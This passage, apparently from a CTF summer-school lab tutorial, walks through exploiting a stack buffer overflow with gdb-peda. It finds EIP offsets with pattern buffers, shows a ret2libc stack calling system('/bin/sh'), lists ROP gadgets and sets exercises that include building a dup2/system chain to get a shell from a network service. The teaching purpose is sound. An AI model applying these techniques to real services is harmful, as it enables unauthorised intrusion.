0000| 0xffffcd70 ("eAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0004| 0xffffcd74 ("AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0008| 0xffffcd78 ("AfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0012| 0xffffcd7c ("5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0016| 0xffffcd80 ("AAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0020| 0xffffcd84 ("A6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0024| 0xffffcd88 ("HAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0028| 0xffffcd8c ("AA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0032| 0xffffcd90 ("AIAAiAA8AAJAAjAA9AAKAAkAALAAl")
0036| 0xffffcd94 ("iAA8AAJAAjAA9AAKAAkAALAAl")
0040| 0xffffcd98 ("AAJAAjAA9AAKAAkAALAAl")
0044| 0xffffcd9c ("AjAA9AAKAAkAALAAl")
0048| 0xffffcda0 ("9AAKAAkAALAAl")
0052| 0xffffcda4 ("AAkAALAAl")
0056| 0xffffcda8 ("ALAAl")
0060| 0xffffcdac --> 0x6c ('l')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414541 in ?? ()
gdb-peda$ pattern_search
Registers contain pattern buffer:
EIP+0 found at offset: 35
EBP+0 found at offset: 31
Registers point to pattern buffer:
[ECX] --> offset 0 - size ~100
[ESP] --> offset 39 - size ~61
Pattern buffer found at:
0xffffcd49 : offset 0 - size 100 ($sp + -0x27 [-10 dwords])
0xffffd1c6 : offset 23424 - size 4 ($sp + 0x456 [277 dwords])
0xffffd1d8 : offset 22930 - size 4 ($sp + 0x468 [282 dwords])
0xffffd276 : offset 48535 - size 4 ($sp + 0x506 [321 dwords])
References to pattern buffer found at:
0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords])
0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords])
As you can see from above, the base pointer gets trashed, so backtracing is not possible:
gdb-peda$ bt
#0 0x41414541 in ?? ()
#1 0x34414165 in ?? ()
#2 0x41464141 in ?? ()
#3 0x41416641 in ?? ()
If this program was larger you wouldn't know which “ret” is the last one executed before jumping into the payload. You can set a breakpoint on all declared functions (if the program has not been stripped) using rbreak and then ignoring them:
gdb-peda$ rbreak
Breakpoint 1 at 0x80482d4
<function, no debug info> _init;
Breakpoint 2 at 0x8048310
<function, no debug info> read@plt;
Breakpoint 3 at 0x8048320
<function, no debug info> __gmon_start__@plt;
Breakpoint 4 at 0x8048330
<function, no debug info> __libc_start_main@plt;
Breakpoint 5 at 0x8048340
<function, no debug info> _start;
Breakpoint 6 at 0x8048370
<function, no debug info> __x86.get_pc_thunk.bx;
Breakpoint 7 at 0x804843f
<function, no debug info> main;
Breakpoint 8 at 0x8048470
<function, no debug info> __libc_csu_init;
Breakpoint 9 at 0x80484e0
<function, no debug info> __libc_csu_fini;
Breakpoint 10 at 0x80484e4
<function, no debug info> _fini;
gdb-peda$ commands
Type commands for breakpoint(s) 1-10, one per line.
End with a line saying just "end".
>continue
>end
gdb-peda$ run
Starting program: /ctf/Hexcellents/summerschool2014/lab_material/session-12/tut1/a
warning: the debug information found in "/usr/lib64/debug/lib64/ld-2.17.so.debug" does not match "/lib/ld-linux.so.2" (CRC mismatch).
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?
Breakpoint 4, 0x08048330 in __libc_start_main@plt ()
Breakpoint 8, 0x08048470 in __libc_csu_init ()
Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx ()
Breakpoint 1, 0x080482d4 in _init ()
Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx ()
Breakpoint 7, 0x0804843f in main ()
Breakpoint 2, 0x08048310 in read@plt ()
AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7
Program received signal SIGSEGV, Segmentation fault.
0x41414541 in ?? ()
When you know what the offending function is, disassemble it and break on "ret":
gdb-peda$ pdis main
Dump of assembler code for function main:
   0x0804843c <+0>: push ebp
   0x0804843d <+1>: mov ebp,esp
   0x0804843f <+3>: and esp,0xfffffff0
   0x08048442 <+6>: sub esp,0x30
   0x08048445 <+9>: mov DWORD PTR [esp+0x8],0x64
   0x0804844d <+17>: lea eax,[esp+0x19]
   0x08048451 <+21>: mov DWORD PTR [esp+0x4],eax
   0x08048455 <+25>: mov DWORD PTR [esp],0x0
   0x0804845c <+32>: call 0x8048310 <read@plt>
   0x08048461 <+37>: mov eax,0x0
   0x08048466 <+42>: leave
   0x08048467 <+43>: ret
End of assembler dump.
gdb-peda$ b *0x08048467
Breakpoint 1 at 0x8048467
AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0xf7f97e54 --> 0x1a6d5c
ECX: 0xffffcd49 ("AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA\n\300\317\377\367\034")
EDX: 0x64 ('d')
ESI: 0x0
EDI: 0x0
EBP: 0x41334141 ('AA3A')
ESP: 0xffffcd6c ("AEAAeAA4AAFAAfA\n\300\317\377\367\034")
EIP: 0x8048467 (<main+43>: ret)
EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048445 <main+9>: mov DWORD PTR [esp+0x8],0x64
   0x804844d <main+17>: lea eax,[esp+0x19]
   0x8048451 <main+21>: mov DWORD PTR [esp+0x4],eax
   0x8048455 <main+25>: mov DWORD PTR [esp],0x0
   0x804845c <main+32>: call 0x8048310 <read@plt>
   0x8048461 <main+37>: mov eax,0x0
   0x8048466 <main+42>: leave
=> 0x8048467 <main+43>: ret
   0x8048468: xchg ax,ax
   0x804846a: xchg ax,ax
   0x804846c: xchg ax,ax
   0x804846e: xchg ax,ax
   0x8048470 <__libc_csu_init>: push ebp
   0x8048471 <__libc_csu_init+1>: push edi
   0x8048472 <__libc_csu_init+2>: xor edi,edi
   0x8048474 <__libc_csu_init+4>: push esi
[------------------------------------stack-------------------------------------]
0000| 0xffffcd6c --> 0xf7e333e0 (<system>: sub esp,0x1c)
0004| 0xffffcd70 --> 0x80484cf (<__libc_csu_init+95>: pop ebp)
0008| 0xffffcd74 --> 0xf7f56be6 ("/bin/sh")
0012| 0xffffcd78 --> 0xf7e25c00 (<exit>: push ebx)
gdb-peda$ patto AEAAeAA4AAFAAfA
AEAAeAA4AAFAAfA found at offset: 35
Then you can break on all called functions or step as needed to see if the payload is doing what you want it to.
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
Apart from objdump which only finds aligned instructions, you can also use dumprop in peda to find all gadgets in a memory region or mapping:
gdb-peda$ start
....
gdb-peda$ dumprop
Warning: this can be very slow, do not run for large memory range
Writing ROP gadgets to file: a-rop.txt ...
0x8048467: ret
0x804835d: iret
0x804838f: repz ret
0x80483be: ret 0xeac1
0x80483a9: leave; ret
0x80485b4: inc ecx; ret
0x80484cf: pop ebp; ret
0x80482f5: pop ebx; ret
0x80484df: nop; repz ret
0x80483a8: ror cl,1; ret
0x804838e: add dh,bl; ret
0x80483e5: ror cl,cl; ret
0x8048465: add cl,cl; ret
0x804840b: leave; repz ret
0x8048371: sbb al,0x24; ret
0x80485b3: adc al,0x41; ret
0x8048370: mov ebx,[esp]; ret
0x80484de: nop; nop; repz ret
0x80483a7: call eax; leave; ret
0x80483e4: call edx; leave; ret
0x804840a: add ecx,ecx; repz ret
0x80484ce: pop edi; pop ebp; ret
A finer-grained search is:
gdb-peda$ asmsearch "pop ? ; ret"
0x080482f5 : (5bc3) pop ebx; ret
0x080484cf : (5dc3) pop ebp; ret
0x080484f6 : (5bc3) pop ebx; ret
gdb-peda$ asmsearch "pop ? ; pop ? ; ret"
0x080484ce : (5f5dc3) pop edi; pop ebp; ret
gdb-peda$ asmsearch "call ?"
0x080483a7 : (ffd0) call eax
0x080483e4 : (ffd2) call edx
0x0804842f : (ffd0) call eax
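The reason such tools find more than objdump is that they scan at every byte offset instead of following instruction boundaries. A rough sketch of that idea for the simplest gadget shape, relying on the one-byte x86 encodings `pop r32` = 0x58+r and `ret` = 0xc3. The function name find_pop_ret and the sample bytes are made up for illustration, and this is not how peda implements its search.

```python
# Register order used by the 0x58+r encoding of `pop r32`.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

def find_pop_ret(code, base, pops=1):
    """Find `pops` consecutive pop r32 followed by ret, at every byte offset."""
    hits = []
    for off in range(len(code) - pops):
        window = code[off:off + pops + 1]
        if window[-1] == 0xC3 and all(0x58 <= b <= 0x5F for b in window[:-1]):
            text = "; ".join(f"pop {REG32[b - 0x58]}" for b in window[:-1]) + "; ret"
            hits.append((base + off, text))
    return hits

# Made-up bytes containing the encodings shown above (5b c3 and 5f 5d c3).
blob = bytes.fromhex("905bc3" "83c40c" "5f5dc3")
for addr, text in find_pop_ret(blob, 0x1000) + find_pop_ret(blob, 0x1000, pops=2):
    print(hex(addr), text)
```

Note how the two-pop gadget also contains a one-pop gadget one byte later, just like 0x80484ce and 0x80484cf in the listings above.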
There can be various annoyances in binaries: ptrace calls for anti-debugging, sleep calls to prevent bruteforcing or fork calls to use child processes to serve requests. These can all be deactivated using unptrace (for ptrace) and deactive in peda.
This task requires you to construct a payload using gadgets and calling the functions inside such that it will print
Hello! stage A!stage B!
Make it also print the messages in reverse order:
Hello! stage B!stage A!
This task is a network service that can be exploited. Run it locally and try to exploit it. You'll find that if you call system("/bin/sh") the shell is opened in the terminal where the server was started instead of the one where the attack takes place. This happens because the client-server communication takes place over a socket. When you spawn a shell it inherits the standard I/O descriptors from the parent and uses those. To fix this you need to redirect the socket fd into 0 and 1 (and optionally 2).
So you will need to do the equivalent of the following in a ROP chain:
dup2(sockfd, 1);
dup2(sockfd, 0);
system("/bin/sh");
Exploit it first with ASLR disabled and then enabled.